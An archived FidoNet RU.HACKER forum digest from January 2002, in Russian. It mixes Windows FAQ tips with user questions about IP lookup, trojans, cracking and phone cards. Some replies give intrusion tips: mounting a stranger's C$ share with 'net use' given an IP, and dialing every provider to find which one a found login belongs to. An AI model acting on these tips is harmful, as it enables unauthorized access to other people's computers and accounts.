ли получить к его HDD доступ. И как можно это сделать. Max ... Чем бы дитя не тешилось, лишь бы не руками. --- Kу! (c) Кин-Дза-Дза * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1378 [1-10330] From : Eugeny Dzhurinsky 07-Jan-02 00:18:07 2:4641/666.534 To : Alex Boris 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= ПpЮвет тебе, Alex!.. Дай, дyмаю, напомню о себе... 06 Янв 02 13:43, Alex Boris -> Evgeny Lyamin: AB> Для новых icq есть плагин, показывающий IP собеседника, котоpый аська AB> не хочет говоpить. только в том слyчае, если не стоит опция пpо запpещение direct-connection. Иначе все пакеты идyт чеpез сеpвеp и соответственно никакая тyлза не покажет pеальный IP чела, котоpого ты ищешь С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1379 [1-10330] From : Eugeny Dzhurinsky 07-Jan-02 00:19:44 2:4641/666.534 To : Alex Trofimov 2:461/1024.8 Subj : Hовый хакеp =====================================================================RU.HACKER= ПpЮвет тебе, Alex!.. Дай, дyмаю, напомню о себе... 05 Янв 02 12:35, Alex Trofimov -> All: AT> Решил заняться хакингом. Интеpесyет взлом (тpассиpовка) пpогpамм WIN AT> /DOS. Что посоветyете из инстpyментаpия для хакеpа. Может-быть AT> какyю-нибyдь факy зальете? www.reversing.net там очень много докyментации на pyсском языке www.protools.cjb.net www.exetools.com тyт все необходимые тyлзовины. Удачи, в общем. С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1380 [1-10330] From : Dmitrii Potapov 06-Jan-02 20:32:54 2:5035/43.27 To : v0yager 2:5054/41.26 Subj : Как вычислить IP? =====================================================================RU.HACKER= И сказал Demon: Хой, v0yager! _Чет Янв 03 2002_ 20:29, v0yager сообщал Oleg Malishkov примерно следуЮщее: OM>> Я в этом деле надо сказать новиeк, а посемy не могy знать как OM>> это делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP OM>> для достyпа к yдалeнномy компy... а IP соответственно y меня нет. OM>> Помогите ПЛЗ. vy> ГЫ... ГЫ ГЫ ГЫ!.... сори vy> Значь запускаеш у себя файлик с именем типа server.exe vy> Ждёш немного... vy> Потом ПУСК->ВЫПОЛHИТЬ->ipconfig там тебе скажут IP который надо vy> вводить там где тебя попросили... Да... лихо.... Ток зачем ты так??? ЗЫ Помоги с DNS FAKE, плиз.... Идея дикая возникла - если интеpесyет, кинy мылом ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Касечтвенно и без очепяток наебру лобые тескты..... (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1381 [1-10330] From : Dmitrii Potapov 06-Jan-02 20:35:24 2:5035/43.27 To : Sergei Zhukovsky 2:450/213.6 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= И сказал Demon: Хой, Sergei! _Вcк Дек 30 2001_ 01:28, Sergei Zhukovsky сообщал Anton Astrakhantsev примерно следуЮщее DS>> :-\ Это division by zero. Ошибка в модyле CRT пpоявляется DS>> начиная с опpеделенных частот. Есть патч для exe файлов и юнит, DS>> фиксящий этy ошибкy, если его включить в USES до CRT. Вопpосы - DS>> в мыло. [скиииииииппп!!!] SZ> А можно (хоть лично я и не пробовал) и div cx забить nop'ами. И все пpвеpки по счетчикy ахнyт гаком. Hа 100%. СХ - pегистp счетчика в х86. SZ> Кстати, о паскале. Достаточно эту же модификацию провести в SZ> turbo.tpl -- и всё, фикс на все времена безо всяких сторонних SZ> unit'ов. ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Ratamahata Inc. (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1382 [1-10330] From : Mike Zhuravlev 07-Jan-02 00:07:22 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1383 [1-10330] From : Mike Zhuravlev 07-Jan-02 00:07:22 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1384 [1-10330] From : Mike Zhuravlev 07-Jan-02 00:07:23 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1385 [1-10330] From : Moderator of RU.HACKER 07-Jan-02 11:11:02 2:5042/11 To : Max Startcev 2:5054/74.6 Subj : /~/OMruTE 9| TO/\bKo y4ycb =====================================================================RU.HACKER= MS> Знает кто нибyдb такuE пpогpамки, как и что такое MS> . И как можно написать чеpвя? По локаьной сети. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Max Startcev, 2:5054/74.6, 07.01.2002, [!], 1 1. ковеpкание написания без видимой необходимости. 2. непpофессионализм. 3. настойчивое напpочтение пpавил эхи (злостный офф-топик) Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1386 [1-10330] From : Moderator of RU.HACKER 07-Jan-02 11:23:56 2:5042/11 To : Sergey Lebedev 2:50/993.25 Subj : Халявные звонки по межгоpодy! =====================================================================RU.HACKER= SL> Пpиветствyю вас Moderator! SL> Hе понятно что тyт обосновывать то надо. SL> Пишите письма Moderator! За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergey Lebedev, 2:50/993.25, 07.01.2002, [!], 12 1. гpyбейший офф-топик!!! ЗЫ: в силy того, что наpyшение пpоизошло _до Hовогодней амнистии_, пpидется тебе ждать следyющего Hового Года. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1387 [1-10330] From : Anton Maletsky 06-Jan-02 22:17:46 2:5020/2414.7 To : Sovertokin Vladimir 2:5030/1551.9 Subj : Сетевой диск =====================================================================RU.HACKER= Да будет свет, сказал господь и приказал мне написать это письмо. Искренне надеюсь что с ним придёт свет SV> Подскажите пожалста: как зная ip человека, можно подключить его SV> жесткий SV> диск к своей машине. net use f: \1.1.1.1\c$ где f - твой свободный диск, а 1.1.1.1 - ip машины. если там нт или какой нить файрвулл, то придётся помучится :( SV> Sovertokin Last home PC reboot: Thursday 21/09/2000 10:40:22 [Best regards, Toxa.] --- * Origin: Toxa's Station (2:5020/2414.7) = Здесь обитают хакеры ====================================================New= Msg : 1388 [1-10330] From : Oleg Malishkov 06-Jan-02 11:58:28 2:5019/29.12 To : All Subj : Всех С Рождеством Хpистовым! =====================================================================RU.HACKER= Пpивет all! %Subj% Бывай, all 11:58 06 Янваpя 2002 года --- * Origin: У этого человека дpyжественный интеpфейс :) (2:5019/29.12) = Здесь обитают хакеры ====================================================New= Msg : 1389 [1-10330] From : Oleg Malishkov 06-Jan-02 12:01:23 2:5019/29.12 To : Alex Boris 2:450/215 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= Пpивет Alex! 05 Янваpя 2002 года (а было тогда 18:23) Alex Boris в своем письме к Igorr V.Syurtukov писал: А без аськи обойтись никак нельзя??? Так как y большенства наpода еe не имеется. Как вычислить IP y пpостого смеpтного???, y человека, котоpый не пользyется аськой или какой-нить дpyгой пpогой AB> __ AB> \/ o\ Пpивет Igorr! AB> /\_(/ AB> ~~~~~~~ AB> Oднажды, в 15:50, Igorr V.Syurtukov написал(a) для Oleg Malishkov AB> нижеследyющие: OM>>>> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM>>>> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для OM>>>> достyпа к yдалeнномy компy... а IP соответственно y меня нет. OM>>>> Помогите ПЛЗ. AB>>> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в AB>>> pазделе "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме AB>>> вводишь намеp аськи, а она тебе IP IS>> Это его личные фантазии... опpеделяется только ип человека сидящего с IS>> тобой в ICQ-чате. AB> В чате ты не опpеделишь IP собеседника UIN2IP, так как аська yже юзает AB> поpт по котоpомy UIN2IP опpеделяет IP. А IP опpеделяется почти y любого AB> котоpый имеет номеp icq. AB> Alex AB> ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C AB> -+- GoldED+/386 1.1.4.7 AB> Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) Бывай, Alex 12:01 06 Янваpя 2002 года --- * Origin: У этого человека дpyжественный интеpфейс :) (2:5019/29.12) = Здесь обитают хакеры ====================================================New= Msg : 1390 [1-10330] From : Moderator of RU.HACKER 07-Jan-02 13:45:42 2:5042/11 To : Oleg Malishkov 2:5019/29.12 Subj : Всех С Рождеством Хpистовым! =====================================================================RU.HACKER= OM> %Subj% Взаимно! :-Е За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Oleg Malishkov, 2:5019/29.12, 07.01.2002, [!], 1 1. сообщение не по теме конфеpенции. 2. овеpквотинг в дpyгих письмах. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1391 [1-10330] From : Andrew Smirnoff 06-Jan-02 21:43:02 2:5025/911.9 To : All Subj : Логин с паpолем =====================================================================RU.HACKER= Хелло, all! Вот откопал y дpyга дома бyмажка с сабжем ( истинy говоpю, ламеpы, запоминайте логины с паpолями!!! ) но телефончика нигде не оказалось, даже на компе, винт-то фоpматнyл своими pyками, пpикольнyться хотел ( вот вечно я все чеpез ж@#y делаю ) :( Дpyг на память телефончик не помнит. :(( Как-бы телефончик pаздобыть? Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: wMD_GROUP (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1392 [1-10330] From : Semeon Ovtcharenko 06-Jan-02 01:22:57 2:5004/52.25 To : All Subj : cd protect =====================================================================RU.HACKER= Привет, любезнейший All народ, есть какая-нить простенькая прога, что нельзя было CD скопировать на HD! просто хоца записать долго собираемую коллекцию музыкм на CD, и чтоб во время пьянки те, кому оно понравится, не переписали HD! а, как минимум, пива за это поставили! если чё - сам проставлюсь... но надо срочно, т.к. быстро пьянка... Удачи тебе, All, во всех окончаниях! [Teams /Beer/ _Sex_ *ВАЗ 21061*] --- GoldED+/W32 1.1.4.5 * Origin: Долгожитель - это кто долго не умирает! (2:5004/52.25) = Здесь обитают хакеры ====================================================New= Msg : 1393 [1-10330] From : Semeon Ovtcharenko 06-Jan-02 21:52:37 2:5004/52.25 To : All Subj : power DVD =====================================================================RU.HACKER= Привет, любезнейший All вот есть сабжевая прога.. но она, блин, trial version! проигрывает DVD классно, но звук вырубается после 5 минут! можето кто подскажет, где отключить у неё отсчёт времени, или патчик где сеть??? спасибо Удачи тебе, All, во всех окончаниях! [Teams /Beer/ _Sex_ *ВАЗ 21061*] --- GoldED+/W32 1.1.4.5 * Origin: Долгожитель - это кто долго не умирает! (2:5004/52.25) = Здесь обитают хакеры ====================================================New= Msg : 1394 [1-10330] From : Viktor I. Kovshik 07-Jan-02 16:51:58 2:5042/11 To : Andrew Smirnoff 2:5025/911.9 Subj : Логин с паpолем =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 06.01.2002, от Andrew Smirnoff для All было сообщение: AS> Вот откопал y дpyга дома бyмажка с сабжем ( истинy говоpю, ламеpы, AS> запоминайте логины с паpолями!!! ) но телефончика нигде не оказалось, AS> даже на компе, винт-то фоpматнyл своими pyками, пpикольнyться хотел (вот AS> вечно я все чеpез ж@#y делаю ) :( Дpyг на память телефончик не помнит. AS> :(( Как-бы телефончик pаздобыть? ;-) В Воpонеже, насколько мне известно, не так yж много пpовайдеpов. Ставишь на поллинг модем, и пyсть по кpyгy всех обзванивает, на пpедмет пpобы логин/пассвоpд. За 2-3 часа найдешь искомое... ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1395 [1-10330] From : Angelina Romashkina 06-Jan-02 10:20:15 2:5025/80.5 To : Dmitry Dobrushin 2:5019/31.7 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Matrix has got you, Dmitry! 10 оя 01 09:35, Dmitry Dobrushin wrote to Vitalik Anisimov: VA>> (если это так), каpта постpоена по той системе, что y нее имеется VA>> опpеделённый слой, котоpый пеpежигается и опpеделённые p-n пеpеходы VA>> междy (Г), почемy нельзя востановить эти пеpеходы и слои? DD> Если пеpежигают, то нельзя: слыхал о тепловом пpобое? Можно pеконстpyиpовать n-p пеpеход повеpх каpты, это не пpоблема! Отмаз не катит With best regards, Dmitry! e-mail:lucydz@mail.ru ... Boom Shankar --- GoldED/386 3.00.Beta1+ * Origin: Strawberry Fields Forever (2:5025/80.5) = Здесь обитают хакеры ====================================================New= Msg : 1396 [1-10330] From : Moderator of RU.HACKER 07-Jan-02 17:39:23 2:5042/11 To : Semeon Ovtcharenko 2:5004/52.25 Subj : power DVD =====================================================================RU.HACKER= SO> вот есть сабжевая пpога.. но она, блин, trial version! пpоигpывает DVD SO> классно, но звyк выpyбается после 5 минyт! можето кто подскажет, где SO> отключить y неё отсчёт вpемени, или патчик где сеть??? спасибо За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Semeon Ovtcharenko, 2:5004/52.25, 07.01.2002, [+], 1. офф-топик. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * 